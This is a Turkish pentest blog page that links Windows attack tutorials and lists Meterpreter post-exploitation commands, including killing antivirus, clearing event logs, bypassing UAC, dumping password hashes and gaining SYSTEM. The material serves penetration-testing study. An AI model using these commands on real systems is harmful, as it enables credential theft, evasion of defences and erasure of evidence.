UAC etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
UAC etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

8 Ekim 2012 Pazartesi

Pentest Senaryoları

Senaryolar

Deneme Ortamı: Free Metasploit Penetration Testing Lab In The Cloud
Kaynak site:
https://community.rapid7.com/community/metasploit/blog/2013/01/08/free-metasploit-penetration-testing-lab-in-the-cloud

Create Exploit Using Msfvenom to Hack Windows 7 SP1
Kaynak site:
http://vishnuvalentino.com/hacking-tutorial/create-exploit-using-msfvenom-to-hack-windows-7-sp1/

5 Ways to Find Systems Running Domain Admin Processes
Kaynak site:
http://www.netspi.com/blog/2012/07/09/5-ways-to-find-systems-running-domain-admin-processes/

Dumping Clear Text Passwords
Kaynak site:
http://e-spohn.com/blog/2012/07/06/dumping-clear-text-passwords/

Yapışkan Tuşlar ile Komut Satırına Geçme
Kaynak site:
http://ertugrulbasaranoglu.blogspot.com/2012/10/ipucu-kapal-oturumda-yapskan-tuslar-ile.html

Bypass Windows Logons with the Utilman.exe Trick
Kaynak site:
http://www.technibble.com/bypass-windows-logons-utilman/
http://www.youtube.com/watch?feature=endscreen&v=di3BIqq40bE&NR=1

Winlockpwn: More then a Partytrick
Kaynak site:
http://www.spylogic.net/2008/05/winlockpwn-more-then-a-partytrick/
http://www.youtube.com/watch?v=jbOioD8LU5Y

Inception
Kaynak site:
http://www.breaknenter.org/projects/inception/

BeeF + Social-Engineering + Metasploit
Kaynak site:
https://www.youtube.com/watch?feature=player_embedded&v=EPJWsElU0fs

Owning Windows Networks with Responder 1.7
Kaynak site:
http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html

Finding Admin Access
Kaynak site:
http://www.room362.com/blog/2012/10/30/finding-admin-access.html

Hack netNTLM Credential using Microsoft Word UNC Path Injector
Kaynak site:
http://www.hackingarticles.in/hack-netntlm-credential-using-microsoft-word-unc-path-injector/

Metasploit ile Oracle Veritabanlarına Yönelik Temel Sızma Testleri
Kaynak site:
http://www.agguvenligi.net/2013/07/metasploit-ile-oracle-pentest.html

5 Ekim 2012 Cuma

Bazı Meterpreter Komutları

Bazı Meterpreter Komutları

Hedef Sistemin Kabuğuna Düşme
execute -f cmd.exe -H -i
shell

Hedef Sistemde Dosya Arama
search -d c:\\documents\ and\ settings\\administrator\\desktop\\ -f *.pdf

Hedef Sistemden veri çekme, veri yükleme
upload BackTrackDizinindekiDosya KurbanBilgisayarDizinindekiDosya
download KurbanBilgisayarDizinindekiDosya BackTrackDizinindekiDosya

Makineyi yeniden başlatma
reboot

Antivirüsü kapatma
killav
Not: Bu modül tam olarak çalışmayabilir. Bu sebeple hedef makinenin kabuğuna düşüldükten sonra, önce AV prosesi bulunur. Sonra ilgili servisi bulunarak kapatılır veya disable edilip yeniden başlatılır. Daha sonra da AV prosesi sonlandırılır.

Event logları silme
clearev

UAC atlatma
run post/windows/escalate/bypassuac

Arp taraması ile makine keşfi
run arp_scanner -r 192.168.25.1/24

Parola özetlerini elde etme
hashdump
Ayrıntılı bilgi için bakınız.

Mevcut prosesleri listeleme
ps

Mevcut prosese sıçrama
migrate <Proses_Id>

Bilgisayarda işlem yapılmama vaktini tespit etme
idletime

Meterpreter'ın çalıştığı prosesin kullanıcısını izleme
getuid

Meterpreter'ın çalıştığı prosesin ID değerini izleme
getpid

SYSTEM hakkına sahip olma
getsystem

Oturumu kapatmadan Meterpreter'dan MSF'e geçiş
background

Oturumu kapatarak Meterpreter'dan MSF'e geçiş
exit